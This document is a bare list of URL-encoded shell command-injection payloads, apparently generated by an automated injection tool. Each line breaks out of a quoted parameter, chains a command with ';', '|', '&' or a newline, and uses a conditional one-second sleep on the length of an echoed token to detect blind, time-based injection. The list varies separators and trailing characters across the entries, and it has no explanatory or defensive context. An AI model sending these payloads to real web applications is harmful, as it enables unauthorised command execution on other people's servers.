+%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%22%7C%20%5B%201%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%202%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%203%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%204%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%205%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%206%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%207%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%208%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%7C%20%5B%209%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%22%7C%20%5B%201%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%202%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%203%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%204%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%205%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%206%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%207%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%208%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%7C%20%5B%209%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%22%7C%20%5B%201%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%202%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%203%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%204%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%205%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%206%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%207%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%208%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%7C%20%5B%209%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%22%7C%20%5B%201%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%202%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%203%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%204%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%205%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%206%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%207%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%208%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%7C%20%5B%209%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 